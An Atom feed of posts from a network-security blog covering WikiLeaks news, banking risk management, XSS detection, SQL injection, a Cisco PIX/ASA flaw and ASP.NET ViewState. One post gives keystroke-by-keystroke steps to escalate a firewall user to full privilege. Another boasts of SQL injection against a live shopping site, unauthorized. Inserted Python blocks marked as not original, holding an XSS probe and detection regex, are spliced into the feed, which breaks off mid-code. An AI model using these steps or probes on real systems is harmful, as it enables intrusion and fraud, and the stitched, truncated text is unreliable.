<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2673681754036568683</id><updated>2012-02-13T23:11:45.084+08:00</updated><title type='text'>Taking Network Security to the Streets</title><subtitle type='html'>Street Security at its best.

"A well known hacker is a good hacker, an unknown hacker is a great hacker..."</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default?start-index=101&amp;max-results=100'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>158</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2175351412934613921</id><published>2010-12-15T22:37:00.000+08:00</published><updated>2010-12-15T22:37:14.597+08:00</updated><title type='text'>More WikiLeaks News</title><content type='html'>Pro WikiLeaks hacker group’s DDoS tool downloads top 40,000 (12/13/10)&lt;br /&gt;Imperva, the web security specialist, has reported that the tool released by the Anonymous Hacker Group for would-be WikiLeaks protesters has been downloaded over 40 000 times, with the majority of downloads occurring in the US. 
Imperva said there were three versions of the denial of service tool that members have been able to use:&lt;br /&gt;&lt;a href="http://www.infosecurity-magazine.com/view/14611/pro-wikileaks-hacker-groups-ddos-tool-downloads-top-40000/ "&gt;http://www.infosecurity-magazine.com/view/14611/pro-wikileaks-hacker-groups-ddos-tool-downloads-top-40000/ &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Anonymous attacks more websites, as second Dutch teenager is arrested in WikiLeaks saga (12/13/10)&lt;br /&gt;&lt;a href="http://www.infosecurity-us.com/view/14621/anonymous-attacks-more-websites-as-second-dutch-teenager-is-arrested-in-wikileaks-saga/ "&gt;http://www.infosecurity-us.com/view/14621/anonymous-attacks-more-websites-as-second-dutch-teenager-is-arrested-in-wikileaks-saga/ &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;WikiLeaks Imbroglio Renews Focus on Risk Management (12/13/10)&lt;br /&gt;&lt;a href="http://www.information-management.com/news/risk_management_data_storage_security_WikiLeaks-10019275-1.html"&gt;http://www.information-management.com/news/risk_management_data_storage_security_WikiLeaks-10019275-1.html&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;WikiLeaks-Related Spam Spotted (12/13/10)&lt;br /&gt;&lt;a href="http://blog.trendmicro.com/wikileaks-related-spam-spotted/ "&gt;http://blog.trendmicro.com/wikileaks-related-spam-spotted/ &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;UK.gov braces for possible Wikileaks hacklash (12/14/10)&lt;br /&gt;&lt;a href="http://www.theregister.co.uk/2010/12/14/wikileaks_hacklash/"&gt;http://www.theregister.co.uk/2010/12/14/wikileaks_hacklash/ &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2175351412934613921?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2175351412934613921/comments/default' title='Post 
Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2175351412934613921' title='52 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2175351412934613921'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2175351412934613921'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2010/12/more-wikileaks-news.html' title='More WikiLeaks News'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>52</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-503875928049552537</id><published>2010-12-14T22:37:00.002+08:00</published><updated>2010-12-15T07:58:41.630+08:00</updated><title type='text'>WikiLeaks</title><content type='html'>So WikiLeaks recently made the news headlines in all major media. Companies with dirty secrets need to be extra vigilant and watch out for attacks. The next attack target, BAC??? Are controls and processes in place?? What mitigation techniques are effective? Let's monitor and watch for now. 
:)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.thestreet.com/story/10945912/2/pr-pros-argue-bofa-needs-to-play-wikileaks-defense.html"&gt;Attacking BAC&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-503875928049552537?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/503875928049552537/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=503875928049552537' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/503875928049552537'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/503875928049552537'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2010/12/wikileaks.html' title='WikiLeaks'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2668970033386638576</id><published>2010-11-03T00:13:00.002+08:00</published><updated>2010-11-03T00:23:32.698+08:00</updated><title type='text'>XSS without Browser</title><content type='html'>To all Sec guys, I have been racking my brain over these past 2 weeks thinking about how to verify successful XSS attacks without using the browser. I know it sounds absurd, but that's the way it is. All I have is pcap files. From those pcap files, we can obviously search for the word "script" or other variants of XSS attacks by using regular expressions. 
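Added example in Python, not code from the original post: the regular-expression sweep described above, run over the URL-decoded query parameters of each request, with the paired response checked for whether the probe came back verbatim, HTML-encoded, or not at all. The four streams are constructed stand-ins for what TCP stream reassembly of the pcap would yield (for instance tshark -z follow,tcp,ascii,N); the host name shop.example and the parameter q are assumptions. Angle brackets are spelled as \x3c and \x3e only because this page is an XML feed.

```python
import re
from html import escape
from urllib.parse import parse_qs, quote, urlsplit

# Attempt signatures to sweep the decoded request parameters with.
XSS_RE = re.compile(
    r"\x3c\s*/?\s*script\b|javascript\s*:|\bon[a-z]+\s*=|\x3c\s*(?:img|svg|iframe)\b",
    re.IGNORECASE,
)

PAYLOAD = "\x3cscript\x3ealert(1)\x3c/script\x3e"  # the classic script-tag probe


def build_stream(query_value, body_fragment, status="200 OK"):
    """Constructed request/response pair, shaped like a TCP stream reassembled from a pcap."""
    req = "GET /search?q=" + quote(query_value) + " HTTP/1.1\r\nHost: shop.example\r\n\r\n"
    resp = ("HTTP/1.1 " + status + "\r\nContent-Type: text/html\r\n\r\n"
            "\x3chtml\x3eResults for " + body_fragment + "\x3c/html\x3e")
    return req, resp


# Four constructed streams (not real captures): same 200 status, very different outcomes.
STREAMS = [
    build_stream(PAYLOAD, PAYLOAD),          # reflected verbatim
    build_stream(PAYLOAD, escape(PAYLOAD)),  # reflected, but HTML-encoded by the application
    build_stream(PAYLOAD, "nothing found"),  # accepted, never reflected
    build_stream("shoes", "shoes"),          # ordinary search, no attempt at all
]


def decoded_params(req):
    """Return the URL-decoded query parameter values from a raw HTTP request line."""
    parts = req.split("\r\n", 1)[0].split(" ")
    if len(parts) != 3:
        return []
    query = urlsplit(parts[1]).query
    return [v for vs in parse_qs(query, keep_blank_values=True).values() for v in vs]


def response_parts(resp):
    """Split a raw HTTP response into (status code, body)."""
    head, _, body = resp.partition("\r\n\r\n")
    status = head.split(" ")[1] if head.startswith("HTTP/") else "?"
    return status, body


def classify(req, resp):
    """Verdict for one stream plus its status code, so the two can be compared side by side."""
    attempts = [v for v in decoded_params(req) if XSS_RE.search(v)]
    status, body = response_parts(resp)
    if not attempts:
        return "no-attempt", status
    if any(p in body for p in attempts):
        return "reflected-raw", status      # markup came back unencoded: a browser would run it
    if any(escape(p) in body for p in attempts):
        return "reflected-encoded", status  # came back as text: the output sink encoded it
    return "not-reflected", status          # the 200 only says the request was served


def sweep(streams):
    """Run the classifier over every stream and keep only the actual attempts."""
    results = []
    for i, (req, resp) in enumerate(streams):
        verdict, status = classify(req, resp)
        if verdict != "no-attempt":
            results.append((i, verdict, status))
    return results


if __name__ == "__main__":
    for i, verdict, status in sweep(STREAMS):
        print(f"stream {i}: HTTP {status} -> {verdict}")
```

All three attempts above return 200, and only the first is evidence of anything: the probe is back in the body unencoded. Even "reflected-raw" is an indicator rather than proof, since the probe may have landed in an HTML comment or inside a quoted attribute where it is inert; a real sweep records the surrounding bytes of the reflection so the context can be judged without a browser.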
However, how do we know if an attempt was successfully executed or is just a false positive? Looking at the HTTP 200 response code will tell me that the attempt went through, but how do we know if we were truly exploited? JavaScript maybe?&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2668970033386638576?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2668970033386638576/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2668970033386638576' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2668970033386638576'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2668970033386638576'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2010/11/xss-without-browser.html' title='XSS without Browser'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-7948288148505299776</id><published>2008-08-18T10:40:00.004+08:00</published><updated>2008-08-18T11:02:53.816+08:00</updated><title type='text'>Better Risk Management for Banking Industry</title><content type='html'>With the recent identity theft cases happening in the banking industry, a new regulation is being implemented to combat identity theft. 
Effective November 1, 2008, all federally regulated banks, credit card companies and other financial institutions will be required to be in full compliance with the Identity Theft Red Flags Rule, which is designed to help financial services firms protect consumers' identities. The goal of the rules is to "flag" attempted and actual identity theft early, thereby reducing the consequences associated with it. &lt;br /&gt;&lt;br /&gt;Each institution's program must include policies and procedures for detecting, preventing and mitigating identity theft. Further, the program must set forth a list of red flag activities that signal possible identity theft and a response plan for when a flag is raised. In addition, each financial institution must update its program periodically to reflect changes in identity theft risks and implement a risk management program as part of the ID Theft Red Flags regulation. &lt;br /&gt;&lt;br /&gt;8 tips for better risk management:&lt;br /&gt;&lt;br /&gt;1. Assess in detail the different products and services a financial institution offers, and review which red flags and what level of risk apply to each one. For example, credit cards need a high level of monitoring because they pose a high risk and fraudulent activity is most likely there.&lt;br /&gt;&lt;br /&gt;2. Streamline automated and manual checks for red flag items where necessary. &lt;br /&gt;&lt;br /&gt;3. Focus on the different channels through which these products and services are delivered to end users. For example, online access over the internet is riskier than physically going to the bank.&lt;br /&gt;&lt;br /&gt;4. Spend a different amount of attention on each product and service offering based on its risk factor. High risk demands more attention.&lt;br /&gt;&lt;br /&gt;5. Study the institution's historical data to identify fraud activities, patterns, etc. &lt;br /&gt;&lt;br /&gt;6. 
Integrate risk management into the current security and privacy programs by adopting a similar approach to risk assessments across the different departments of the enterprise and reusing the data from each department's assessment in the others. This makes it clear which regulation directly addresses a given risk or red flag action item, avoids duplicated effort, and lets you place checks on the items that are relevant.&lt;br /&gt;&lt;br /&gt;7. Do not depend totally on the vendor or service bureau to put checks in place and conduct their own risk assessment. Instead, have a thorough risk assessment program initiated and implemented by the financial institution for each of its service bureaus, to ensure foolproof checks and updates.&lt;br /&gt;&lt;br /&gt;8. Appoint a key person to take charge and ownership of the risk management process. This person will initiate an annual review of the program's effectiveness, adopt a revision process, constantly monitor and analyze the current industry situation and risk profile, and appoint a committee to ensure that the appropriate program is deployed and to make and propose changes. 
&lt;br /&gt;Upasana&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-7948288148505299776?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/7948288148505299776/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=7948288148505299776' title='289 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7948288148505299776'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7948288148505299776'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2008/08/better-risk-management-for-banking.html' title='Better Risk Management for Banking Industry'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>289</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-7094542992146202228</id><published>2008-08-18T08:06:00.009+08:00</published><updated>2008-08-20T15:43:22.921+08:00</updated><title type='text'>How to hack a Bank part 1?</title><content type='html'>This is going to be a very sensitive topic for the banking industry; however, I am not going to post any exploits or vulnerabilities showing how to hack a bank, but instead a high-level overview of how to gain money from a bank. I am not going to write a long article on this as the story might go on and on. &lt;br /&gt;&lt;br /&gt;Several months back, I was performing a penetration test for a large bank here. 
Although it was only a web penetration test, I was already starting to observe the banking environment, the technology used, the physical environment, their partners, ATMs, etc., to see if loopholes could be discovered. Every day at the bank, I made new friends and started talking to them to learn more about the banking environment and the nature of the job. At the end of the penetration test, I was thinking of publishing an article on how to hack a bank; however, either I was too lazy to do so or I couldn't be bothered. Today, I just feel like writing an article on it, just a sudden urge to do so.&lt;br /&gt;&lt;br /&gt;In the early days, the banking environment used to be a simple and closed environment whereby the only way to hack the bank was to rob the bank. There were no ATMs, no internet banking, no huge and complicated networks. To withdraw any money, the only way was to go to the bank's branch, fill out the withdrawal form and provide your bank account passbook for updating purposes, and the money was given to you. The mainframe was the backend system that did all the processing of transactions, and I think it still prevails to this very day. Today, we are more advanced. We have internet banking without the need for any passbooks, we have ATMs, credit and debit cards, complex networks to interconnect multiple systems together, cash deposit machines, huge variations of databases and partners that might house the bank's data/information. So you see, it used to be maybe one or two doors open. Today, however, many more possibilities exist because multiple doors are open. We still have not factored in the physical site and environment. You might be surprised that this is one of the easiest ways to enter the bank.&lt;br /&gt;&lt;br /&gt;A lot of people might think that hacking a bank is a tough job due to its tight security and controls, but you might be surprised that sometimes the weakest link is actually the easiest link. 
Stay tuned for part 2.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Disclaimer: The materials and information here are solely for educational purposes. Do not attempt to hack a bank with the knowledge acquired. Do not try this at any bank.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-7094542992146202228?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/7094542992146202228/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=7094542992146202228' title='12 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7094542992146202228'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7094542992146202228'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2008/08/how-to-hack-bank-part-1.html' title='How to hack a Bank part 1?'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>12</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2111924034139519017</id><published>2008-05-12T16:28:00.003+08:00</published><updated>2008-07-28T20:13:44.607+08:00</updated><title type='text'>Yet Another SQL injection</title><content type='html'>I was bored the other day, so here I am again toying and playing with SQL injection. Wow, for this particular site, not only did they not turn off debugging, they also allowed me to view other very juicy information. 
I must say, if I were determined to hack the site, I could successfully grab lots of juicy information. Not only that, because it is an online shopping site, I could change information and buy things at a much, much cheaper price. Check out the information leakage!!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp1.blogger.com/_Zx8XWzC_KPQ/SCgEy2F0DdI/AAAAAAAAAgo/TOhMdDUO2l4/s1600-h/leak1.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp1.blogger.com/_Zx8XWzC_KPQ/SCgEy2F0DdI/AAAAAAAAAgo/TOhMdDUO2l4/s400/leak1.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5199411041359105490" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://bp3.blogger.com/_Zx8XWzC_KPQ/SCgEzWF0DeI/AAAAAAAAAgw/Z9fBV1KDt2Y/s1600-h/leak2.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_Zx8XWzC_KPQ/SCgEzWF0DeI/AAAAAAAAAgw/Z9fBV1KDt2Y/s400/leak2.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5199411049949040098" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/SCgEzmF0DfI/AAAAAAAAAg4/C--mjhx0-0A/s1600-h/leak3.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/SCgEzmF0DfI/AAAAAAAAAg4/C--mjhx0-0A/s400/leak3.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5199411054244007410" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2111924034139519017?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2111924034139519017/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2111924034139519017' title='9 
Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2111924034139519017'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2111924034139519017'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2008/05/yet-another-sql-injection.html' title='Yet Another SQL injection'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_Zx8XWzC_KPQ/SCgEy2F0DdI/AAAAAAAAAgo/TOhMdDUO2l4/s72-c/leak1.JPG' height='72' width='72'/><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-4873122251028581801</id><published>2008-04-03T14:41:00.002+08:00</published><updated>2008-04-03T15:33:09.464+08:00</updated><title type='text'>Scanless PCI, Hurray</title><content type='html'>Some time ago, I mentioned something about PCI and its credibility. In short, I was asking whether all those PCI-certified companies are safe from attacks just because they are PCI certified. Today we witnessed something better, more cost effective, faster, less intrusive, and the best part? It does not even cost a single cent compared to HackerSafe or Qualys, unless you subscribe to additional services. Well, I have not personally registered for the service, but I guess it will be much more proficient with the current PCI standards. The setup is simple: just copy and paste the code to your site and that will do it. 
Check out&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.scanlesspci.com"&gt;http://www.scanlesspci.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp3.blogger.com/_Zx8XWzC_KPQ/R_SH--nqacI/AAAAAAAAAgA/eT4cXcZexOM/s1600-h/pci.bmp"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_Zx8XWzC_KPQ/R_SH--nqacI/AAAAAAAAAgA/eT4cXcZexOM/s400/pci.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5184918587041278402" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-4873122251028581801?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/4873122251028581801/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=4873122251028581801' title='13 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4873122251028581801'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4873122251028581801'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2008/04/scanless-pci-hurray.html' title='Scanless PCI, Hurray'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_Zx8XWzC_KPQ/R_SH--nqacI/AAAAAAAAAgA/eT4cXcZexOM/s72-c/pci.bmp' height='72' 
width='72'/><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-1405226493513082027</id><published>2008-01-30T15:10:00.000+08:00</published><updated>2008-01-30T16:10:25.326+08:00</updated><title type='text'>PIX/ASA Finesse 7.1 &amp; 7.2 Privilege Escalation</title><content type='html'>I was trying to get into admin mode without the enable password during a penetration test and I came across a post by Terry where he describes a design flaw in the PIX/ASA Finesse operating system, versions 7.1 and 7.2. Well, it was possible to escalate a normal level 0 user to a level 15 privileged user. The exploit is simple, and it works locally at the console and remotely over Telnet. However, do note that it will &lt;strong&gt;NOT &lt;/strong&gt;work if SSH, TACACS or RADIUS is implemented on the firewall. Below are the steps.&lt;br /&gt;&lt;br /&gt;1. Log in with your user level 0 account. Once logged on, you will be prompted to enter the enable password, which is the privilege password.&lt;br /&gt;&lt;br /&gt;2. At this prompt, if you move your cursor forward with a space or character (it doesn't matter if there is more than one), and then proceed to delete any spaces or characters by holding down backspace for a second after deleting the last character, it should immediately drop you into level 15 privileged-exec mode. 
&lt;br /&gt;&lt;br /&gt;It has been tested on a PIX 515E running Finesse version 7.2, and I have also tested it on the PIX 525.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-1405226493513082027?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/1405226493513082027/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=1405226493513082027' title='20 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1405226493513082027'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1405226493513082027'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2008/01/pixasa-finesse-71-72-privilege.html' title='PIX/ASA Finesse 7.1 &amp; 7.2 Privilege Escalation'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>20</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-5485225735817763062</id><published>2008-01-16T14:03:00.000+08:00</published><updated>2008-01-16T14:19:07.251+08:00</updated><title type='text'>Web Attacker Toolkit</title><content type='html'>Sorry for the lack of updates. I have been roaming around for the past 2 months and felt a little lazy about updating my blog. I was reading news on the internet today and read something about a hacking toolkit that was able to compromise thousands of web servers, and that caught my attention. 
Well, apparently the tool, called the "Web Attacker Toolkit", can be bought from the Russian hacking group called Inex-Lux for a cheap price. All unpatched IE and Firefox browsers can be compromised, with a trojan silently installed on the local PC without the user knowing it. Once a trojan is installed, the game is over. After reading the news, of course I upgraded my IE and my Firefox to the latest version to avoid any exploitation. Check out the three links below:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.informationweek.com/news/showArticle.jhtml?articleID=186700539"&gt;http://www.informationweek.com/news/showArticle.jhtml?articleID=186700539&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.websense.com/securitylabs/alerts/alert.php?AlertID=472"&gt;http://www.websense.com/securitylabs/alerts/alert.php?AlertID=472&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://informationweek.com/news/showArticle.jhtml?articleID=205603044"&gt;http://informationweek.com/news/showArticle.jhtml?articleID=205603044&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-5485225735817763062?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/5485225735817763062/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=5485225735817763062' title='47 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/5485225735817763062'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/5485225735817763062'/><link rel='alternate' type='text/html' 
href='http://hackathology.blogspot.com/2008/01/web-attacker-toolkit.html' title='Web Attacker Toolkit'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>47</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-929751356444362472</id><published>2007-12-02T18:31:00.000+08:00</published><updated>2007-12-03T10:18:47.378+08:00</updated><title type='text'>.NET ViewState vulnerable to manipulation exploits</title><content type='html'>This past week I had a chance to audit a customer who is using Microsoft's ViewState. So what is ViewState and why is it vulnerable? Well, ViewState is an ASP.NET feature that persists form control properties when a page posts back to itself. ASP.NET takes the current state of all form controls and stores it as an encoded string in a hidden form field. The risk of ViewState is that an attacker may be able to view or modify these values to accomplish a variety of attacks. So, how do you view and modify the values in ViewState? You can download PortSwigger's latest Burp proxy to do the necessary manipulation. ViewState appears in the HTML source as a hidden form field named __VIEWSTATE and is base64 encoded. 
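As an added example, not code from the original post nor from Burp or Fritz Onion's decoder: a small Python parser for the unencrypted ObjectStateFormatter encoding that sits behind the base64 of the __VIEWSTATE field, written from the token values in the .NET reference source, plus a builder used only to construct test vectors. The page state it decodes is constructed and the field names in it are assumptions. It also reports how many bytes are left over after the state graph, which is how decoders notice an appended MAC.

```python
import base64

# ObjectStateFormatter token bytes (the subset handled here); values taken from the
# .NET reference source for System.Web.UI.ObjectStateFormatter.
T_INT16, T_INT32, T_STRING = 0x01, 0x02, 0x05
T_PAIR, T_TRIPLET, T_ARRAYLIST = 0x0F, 0x10, 0x16
T_ISTRING_ADD, T_ISTRING = 0x1E, 0x1F          # string-table add / string-table reference
T_NULL, T_EMPTYSTRING, T_ZEROINT32, T_TRUE, T_FALSE = 0x64, 0x65, 0x66, 0x67, 0x68
MAGIC = b"\xff\x01"                             # format marker, version 1
MAC_LENGTHS = {20: "HMACSHA1", 32: "HMACSHA256", 48: "HMACSHA384", 64: "HMACSHA512"}


def _read_7bit(buf, pos):
    """Read a .NET 7-bit variable-length integer; return (value, position after it)."""
    value, mult = 0, 1
    while True:
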